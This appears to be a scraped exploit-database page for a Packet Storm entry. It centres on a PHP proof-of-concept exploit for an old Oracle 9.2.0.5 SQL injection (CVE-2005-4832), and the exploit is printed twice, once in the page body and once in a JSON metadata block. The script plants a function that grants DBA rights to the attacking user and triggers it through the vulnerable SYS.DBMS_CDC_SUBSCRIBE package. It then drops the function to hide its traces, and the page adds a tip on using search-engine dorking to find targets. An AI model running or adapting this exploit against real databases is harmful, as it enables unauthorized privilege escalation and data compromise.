📄 Oracle Database Server 9.2.0.5 SQL Injection_PACKETSTORM:215533

7.5 / 10

HIGH

AV:N/AC:L/Au:N/C:P/I:P/A:P

Description

Oracle Database Server version 9.2.0.5 proof of concept remote SQL injection exploit that leverages SYS.DBMSCDCSUBSCRIBE.ACTIVATESUBSCRIPTION and makes use of an older vulnerability from 2005...

Visit Original Source

Basic Information

ID PACKETSTORM:215533

Published Feb 13, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Oracle Database Server 9.2.0.5 SQL Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.oracle.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: SQL injection vulnerability in Oracle database SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package.

(Related : https://packetstorm.news/files/id/180720/ Linked CVE numbers: CVE-2005-4832 ) .

[+] save code as poc.php.

[+] Set target : line 3 + 4 + 5 + 6 + 7

[+] PayLoad :

<?php
// إعداد الاتصال بقاعدة بيانات Oracle
$host = "localhost"; // استبدلها بعنوان السيرفر
$port = "1521"; // منفذ Oracle
$sid = "ORCL"; // معرف قاعدة البيانات
$user = "victim_user"; // المستخدم المستهدف
$password = "victim_password"; // كلمة المرور

try {
$dsn = "oci:dbname=$host:$port/$sid;charset=UTF8";
$conn = new PDO($dsn, $user, $password);
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

echo "[+] الاتصال بقاعدة البيانات ناجح!\n";

// اسم دالة عشوائية
$func_name = "h4ck" . rand(1000, 9999);

// إنشاء دالة تقوم بتنفيذ أوامر SQL بامتيازات عالية
$function = "
CREATE OR REPLACE FUNCTION $func_name RETURN VARCHAR2
AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO $user';
RETURN '';
END;
";

// استعلام الحقن
$injection = "
BEGIN
sys.dbms_cdc_subscribe.activate_subscription('''||$func_name()||''');
END;
";

// حذف الدالة بعد التنفيذ
$clean = "DROP FUNCTION $func_name";

echo "[+] إرسال الدالة الضارة...\n";
$conn->exec($function);

try {
echo "[+] محاولة تنفيذ حقن SQL...\n";
$conn->exec($injection);
} catch (Exception $e) {
echo "[-] فشل تنفيذ الحقن: " . $e->getMessage() . "\n";
} finally {
echo "[+] تنظيف الآثار...\n";
$conn->exec($clean);
}

echo "[+] انتهى التنفيذ.\n";
} catch (PDOException $e) {
die("[-] خطأ في الاتصال: " . $e->getMessage() . "\n");
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-13T18:05:49",
    "description": "Oracle Database Server version 9.2.0.5 proof of concept remote SQL injection exploit that leverages SYS.DBMSCDCSUBSCRIBE.ACTIVATESUBSCRIPTION and makes use of an older vulnerability from 2005...",
    "published": "2026-02-13T00:00:00",
    "modified": "2026-02-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Oracle Database Server 9.2.0.5 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215533",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2005-4832"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Oracle Database Server 9.2.0.5 SQL Injection Vulnerability                                                                  |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.oracle.com/                                                                                                     |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: SQL injection vulnerability in Oracle database SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package.\n    \n       (Related : https://packetstorm.news/files/id/180720/ Linked CVE numbers: CVE-2005-4832 ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Set target : line 3 + 4 + 5 + 6 + 7\n    \n    [+] PayLoad :\n    \n    <?php\n    // \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0642\u0627\u0639\u062f\u0629 \u0628\u064a\u0627\u0646\u0627\u062a Oracle\n    $host = \"localhost\"; // \u0627\u0633\u062a\u0628\u062f\u0644\u0647\u0627 \u0628\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0633\u064a\u0631\u0641\u0631\n    $port = \"1521\"; // \u0645\u0646\u0641\u0630 Oracle\n    $sid = \"ORCL\"; // \u0645\u0639\u0631\u0641 \u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a\n    $user = \"victim_user\"; // \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\n    $password = \"victim_password\"; // \u0643\u0644\u0645\u0629 \u0627\u0644\u0645\u0631\u0648\u0631\n    \n    try {\n        $dsn = \"oci:dbname=$host:$port/$sid;charset=UTF8\";\n        $conn = new PDO($dsn, $user, $password);\n        $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\n    \n        echo \"[+] \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0646\u0627\u062c\u062d!\\n\";\n    \n        // \u0627\u0633\u0645 \u062f\u0627\u0644\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629\n        $func_name = \"h4ck\" . rand(1000, 9999);\n    \n        // \u0625\u0646\u0634\u0627\u0621 \u062f\u0627\u0644\u0629 \u062a\u0642\u0648\u0645 \u0628\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 SQL \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0627\u0644\u064a\u0629\n        $function = \"\n            CREATE OR REPLACE FUNCTION $func_name RETURN VARCHAR2\n            AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION;\n            BEGIN\n            EXECUTE IMMEDIATE 'GRANT DBA TO $user';\n            RETURN '';\n            END;\n        \";\n    \n        // \u0627\u0633\u062a\u0639\u0644\u0627\u0645 \u0627\u0644\u062d\u0642\u0646\n        $injection = \"\n            BEGIN\n                sys.dbms_cdc_subscribe.activate_subscription('''||$func_name()||''');\n            END;\n        \";\n    \n        // \u062d\u0630\u0641 \u0627\u0644\u062f\u0627\u0644\u0629 \u0628\u0639\u062f \u0627\u0644\u062a\u0646\u0641\u064a\u0630\n        $clean = \"DROP FUNCTION $func_name\";\n    \n        echo \"[+] \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062f\u0627\u0644\u0629 \u0627\u0644\u0636\u0627\u0631\u0629...\\n\";\n        $conn->exec($function);\n    \n        try {\n            echo \"[+] \u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0646\u0641\u064a\u0630 \u062d\u0642\u0646 SQL...\\n\";\n            $conn->exec($injection);\n        } catch (Exception $e) {\n            echo \"[-] \u0641\u0634\u0644 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062d\u0642\u0646: \" . $e->getMessage() . \"\\n\";\n        } finally {\n            echo \"[+] \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0622\u062b\u0627\u0631...\\n\";\n            $conn->exec($clean);\n        }\n    \n        echo \"[+] \u0627\u0646\u062a\u0647\u0649 \u0627\u0644\u062a\u0646\u0641\u064a\u0630.\\n\";\n    } catch (PDOException $e) {\n        die(\"[-] \u062e\u0637\u0623 \u0641\u064a \u0627\u0644\u0627\u062a\u0635\u0627\u0644: \" . $e->getMessage() . \"\\n\");\n    }\n    ?>\n    \n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215533",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
        "version": "2.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215533/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply